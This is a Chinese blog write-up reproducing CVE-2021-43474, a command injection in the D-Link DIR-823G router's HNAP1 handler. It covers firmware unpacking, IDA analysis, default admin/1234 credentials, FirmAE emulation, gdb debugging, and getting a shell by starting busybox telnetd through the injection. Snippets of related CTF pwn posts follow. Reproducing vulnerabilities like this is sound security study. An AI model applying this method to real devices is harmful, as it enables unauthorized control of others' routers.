CVE-2021-43474
[[CVE]]
[固件下载](D-Link Technical Support)
Ubuntu18
IDA9.1
binwalk
[[FirmAE]]
[[firmwalker]]
固件分析
binwalk解包
先使用binwalk 查看固件信息
1 | binwalk DIR823G_V1.0.2B05_20181207.bin |
Squashfs文件系统
再进行解包
1 | binwalk -Me DIR823G_V1.0.2B05_20181207.bin |
我们先来分析etc文件夹中的inittab启动信息
我们继续查看rcS文件
watchdog应该是一种进程的监控程序,启动1000秒后启动web服务文件goahead ,#boa 是被注释掉的,boa 没有被启动
checksec&file查看文件信息
文件为mips,未开启保护
我们使用ida打开goahead文件进行分析
我们着重关注
1 | if ( sub_423F90() < 0 ) |
中的sub_423F90函数
管理界面初始化函数
第14行 sub_416908("adm", 7, 3, 0, 0);创建名为 adm 的权限组
第17行 sub_415F5C("admin", "1234", "adm", 0, 0);默认账号密码为admin / 1234
第46行 sub_40B1F4("/HNAP1", 0, 0, sub_42383C, 0); 漏洞点在sub_42383C函数中
这里把参数 a7原样放进 echo 命令,然后交给 system() 执行,并且没有任何的过滤
我们搜索与HNAP1相关的文件
1 | grep -ir "HNAP1" |
查看hnap.js和SOAPAction.js 文件
其中SOAPAction.js是传输协议
hnap.js为两段式请求
先 GET /hnap/<HnapName>.json 拿一份模板数据,再 POST /HNAP1/,用头部SOAPACTION: "http://purenetworks.com/HNAP1/<HnapName>"HNAP_AUTH: <HMAC> <timestamp> 发送 JSON/XML 正文。
固件模拟
使用[[FirmAE]]进行模拟
1 | sudo ./run.sh -d dlink DIR823G_V1.0.2B05_20181207.bin |
漏洞复现
我们先写一段exp测试以下漏洞情况
在HNAP1界面时的http请求包内容
1 | import requests |
根据请求包写脚本
找到漏洞点函数地址和system执行的地址
1 | set architecture mips |
准备好gdb配置脚本
使用FirmAE中的gdbserver,将goahead服务器文件挂起
1 | gdb-multiarch -x mygdb.gdb |
执行命令打开gdb
C到断点处,再运行我们的exp脚本
运行完成后再c,跳到下一个断点,n走到system执行处
进行执行
使用FirmAE的shell进行查看,发现成功写入
由于没有/dev/tcp,也没有telnet,我们可以使用/bin/busybox中的telnetd进行反弹shell
1 | import requests |
1 | telnet 192.168.0.1 4444 |
成功拿到shell
相关推荐
2025-07-25
SQCTF
浅红欺醉粉,肯信有江梅直接nc连接即可 借的东风破金锁 输入的内容只要相等即可 但是直接输入就超出了范围 ai搜出输入方法 12345678910111213141516171819202122232425262728293031323334353637383940414243from pwn import * #引用pwntools库from LibcSearcher import *misaki=1if misaki: context(log_level='debug',arch='amd64',os='linux')else: context(log_level='debug',arch='i386',os='linux')ming=1if ming: p=remote('challenge.qsnctf.com',31915)#配置远程连接nc challenge.qsnctf.com 31915else: ...
2025-07-25
ctfshow43-67
1-pwn43 ida打开文件后发现有明显的溢出点 有systeam函数可以使用,但是没用/bin/sh,尝试使用libc无法成功 gdb vmmap可以查看到程序有一段可写的部分,可以使用这一部分去写入/bin/sh 使用objdump -d -j .plt pwn命令可以查看到程序的函数plt地址 12345678910111213141516171819202122232425from pwn import * #引用pwntools库context(log_level='debug',arch='i386',os='linux')ming=1if ming: p=remote('pwn.challenge.ctf.show',28282)#配置远程连接 28282else: p=process("pwn")#配置本地连接:#gdb.attach(p)main_add=0x080487AFsystem=0x804845...
2025-07-25
轩辕杯
轩辕杯
2025-07-25
御网杯
ez_pwn 关闭标准输出流 溢出点 考虑使用wirte(2, got, 0x200) 程序 gadget 有 rdi 和 rsi,rdx 调试后发现没有被修改过还是 200,就无需修改,泄露 write 的真实地址,算出偏移,即可 获得 sh 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364from pwn import * #引用pwntools库from LibcSearcher import *misaki=1if misaki: context(log_level='debug',arch='amd64',os='linux')else: context(log_level='debug',arch='i386',os='linux')ming=1...
2025-08-19
CTFshow PWN162
此文章参考了: CTFshow PWN162 堆利用技巧大杂烩_ctfshow-pwn-162-CSDN博客 好好说话之IO_FILE利用(1):利用_IO_2_1_stdout泄露libc_libc泄露方式-CSDN博客 使用realloc函数来调整栈帧让one_gadget生效 - ZikH26 - 博客园 感谢师傅的讲解 本文章只描述了本地是操作是如何打通程序的,远程需要爆破出I0_2_1_stderr_ 的第四位 1/16 概率 本题使用了double_free,unsortedbin_attack 、_IO_2_1_stdout、house of spirit,UAF 经典的增删改查 add 后会有一个固定的 0x28 大小的 chunk,和一个自行输入 size 大小的 chunk,size 被限制大小,add 的 chunk 数量也被限制为 0x13,并且 s->data 为 inuse 此时的堆结构 show 是假函数,无法 show delete 函数中,if 检测 chunk_s+v1 实际上并不是inuse 的值,所以这边是一个假判...
2025-08-20
CTFshow PWN164
muea 中只有 add 和 delete add 中使用的是 realloc 什么是 realloc 呢? 可以参考如下文章 https://squarepants0.github.io/2020/11/18/2019-realloc-magic-realloc-yu-tcache/#toc-heading-2 简单来说就说 mallco 和 free 的结合 plus 版 1234567891011void *realloc(void *ptr, size_t size)# ptr=0 && size!=0# 视作mallco(size) 返回对应的地址# ptr!=0 && size==0# 视作free(ptr)#ptr!=0 && size!=0#当上一次mallco返回的ptr值的size > 现在需要申请的size,则会进行缩小,然后多余的进行free#当上一次mallco返回的ptr值的size < 现在需要申请的size,则会进行扩容#如果上一次mallco返回的ptr已经被free了,且 <...
评论
最新文章
![[BJDCTF 2020]YDSneedGirlfriend](/img/4.jpg)
